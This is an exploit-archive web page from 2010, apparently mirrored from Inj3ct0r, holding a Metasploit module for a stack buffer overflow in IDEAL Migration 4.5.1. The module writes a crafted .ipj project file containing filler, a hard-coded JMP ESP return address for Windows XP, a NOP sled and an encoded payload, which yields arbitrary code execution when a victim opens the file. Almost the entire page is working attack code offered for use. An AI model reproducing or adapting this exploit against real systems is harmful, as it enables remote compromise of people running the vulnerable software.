Home / os / win7

IDEAL Migration v4.5.1 Buffer Overflow Exploit (Meta)

Posted on 10 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>IDEAL Migration v4.5.1 Buffer Overflow Exploit (Meta)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================== IDEAL Migration v4.5.1 Buffer Overflow Exploit (Meta) ===================================================== ### ## This file is part of the Metasploit Framework and may be subject to ## redistribution and commercial restrictions. Please see the Metasploit ## Framework web site for more information on licensing and terms of use. ## http://metasploit.com/framework/ ### require 'msf/core' class Metasploit3 &lt; Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' =&gt; 'IDEAL Migration Version 4.5.1 Buffer Overflow', 'Description' =&gt; %q{ This module exploits a stack overflow in IDEAL Migration version 4.5.1. By creating a specially crafted ipj file, an an attacker may be able to execute arbitrary code. }, 'License' =&gt; MSF_LICENSE, 'Author' =&gt; [ 'blake' ], 'Version' =&gt; 'Version 1', 'References' =&gt; [ [ 'URL', 'http://www.exploit-db.com/exploits/12404' ], ], 'DefaultOptions' =&gt; { 'EXITFUNC' =&gt; 'seh', }, 'Payload' =&gt; { 'Space' =&gt; 986, 'BadChars' =&gt; &quot;x00x1ax0ax0d&quot;, 'StackAdjustment' =&gt; -3500, }, 'Platform' =&gt; 'win', 'Targets' =&gt; [ [ 'Windows XP Universal', { 'Ret' =&gt; 0x7c96bf33 } ], # JMP ESP in ULMigration_us.dll ], 'Privileged' =&gt; false, 'DisclosureDate' =&gt; 'April 26, 2010', 'DefaultTarget' =&gt; 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.ipj']), ], self.class) end def exploit sploit = &quot;x0Dx0Ax5Bx47x72x6Fx75x70x2Cx45x78x70x6F&quot; sploit &lt;&lt; &quot;x72x74x2Cx59x65x73x5Dx0Dx0A&quot; sploit &lt;&lt; &quot;x43x6fx6dx70x75x74x65x72x3D&quot; sploit &lt;&lt; rand_text_alpha_upper(2420) sploit &lt;&lt; [target.ret].pack('V') sploit &lt;&lt; make_nops(10) sploit &lt;&lt; payload.encoded sploit &lt;&lt; &quot;x0Dx0Ax5Bx45x6Ex64x5Dx0Dx0A&quot; ipj = sploit print_status(&quot;Creating '#{datastore['FILENAME']}' file ...&quot;) file_create(ipj) end end # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP